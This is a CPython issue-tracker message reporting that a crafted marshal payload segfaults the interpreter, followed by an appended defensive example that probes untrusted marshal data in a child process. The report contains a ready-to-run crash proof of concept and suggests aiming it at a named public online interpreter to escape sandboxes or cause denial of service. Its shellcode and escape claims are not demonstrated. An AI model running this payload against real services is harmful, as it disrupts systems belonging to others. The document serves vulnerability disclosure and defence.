Message373557
There are many online Python interpreters; we can use this malicious file to escape their sandboxes and get control of their Docker container or system (and abuse them, for example, to conduct a DoS attack), as they fully trust that Python doesn't generate a segfault.
For example, the following code clearly kills the interpreter (and a shellcode can be attached), even though they have protection mechanisms for file access and many other things.
-----------
https://www.programiz.com/python-programming/online-compiler/
-----------
import io
import marshal
hex_string = "FBE901000000DA0136E90209000072010000007203000000DA0168A90372010000007205000000DA026161DA026A6A7BDA0278785B020000007201000000DA01353030DA0170E7E10B930189E4414130"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
data = marshal.load(f)
print(data)
print('We have segfault but we cannot see!')
-------------------
Date | User | Action | Args
2020-07-12 14:45:23 | Iman Sharafaldin | set | recipients: + Iman Sharafaldin, vstinner, christian.heimes, serhiy.storchaka
2020-07-12 14:45:23 | Iman Sharafaldin | set | messageid: <1594565123.06.0.21254483975.issue41208@roundup.psfhosted.org>
2020-07-12 14:45:23 | Iman Sharafaldin | link | issue41208 messages
2020-07-12 14:45:22 | Iman Sharafaldin | create |
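A defensive counterpart to the report above, added here as an example (not code from the message or from CPython): a service that must unmarshal bytes it did not produce can do so in a child interpreter and read the exit status, so a segfault is observed instead of silently lost. `probe_marshal`, `_CHILD` and `child_src` are hypothetical names, and the sample inputs are constructed.

```python
import marshal
import subprocess
import sys

# Child program: unmarshal stdin and print only the repr of the result.
# It runs in its own interpreter, so a crash cannot take the caller down.
_CHILD = (
    "import sys, marshal\n"
    "sys.stdout.write(repr(marshal.loads(sys.stdin.buffer.read())))\n"
)

def probe_marshal(blob, timeout=5.0, child_src=_CHILD):
    """Unmarshal `blob` in a throwaway interpreter and classify the outcome.

    `child_src` is overridable only so the crash path can be exercised
    without a crashing payload (hypothetical helper, not a CPython API).
    """
    try:
        proc = subprocess.run(
            [sys.executable, "-I", "-c", child_src],
            input=blob, capture_output=True, timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return {"status": "timeout"}
    if proc.returncode < 0:
        # POSIX: a negative return code is the number of the signal that
        # killed the child (11 = SIGSEGV). Windows reports crashes as large
        # positive codes, which land in the "rejected" branch below.
        return {"status": "crashed", "signal": -proc.returncode}
    if proc.returncode != 0:
        # marshal raised (EOFError, ValueError, TypeError): malformed input.
        tail = proc.stderr.decode(errors="replace").strip().splitlines()[-1:]
        return {"status": "rejected", "error": tail[0] if tail else ""}
    return {"status": "ok", "repr": proc.stdout.decode(errors="replace")}

if __name__ == "__main__":
    good = marshal.dumps({"a": [1, 2, 3]})   # constructed benign sample
    print(probe_marshal(good))
    print(probe_marshal(good[:-2]))          # constructed truncated sample
    # Simulated crash: the child sends itself SIGSEGV (no malicious input).
    print(probe_marshal(
        b"", child_src="import os, signal; os.kill(os.getpid(), signal.SIGSEGV)"))
```

Process isolation only turns the crash into an observable failure; the `marshal` documentation warns that the module is not secure against maliciously constructed data, so the child itself still needs the container or OS sandbox.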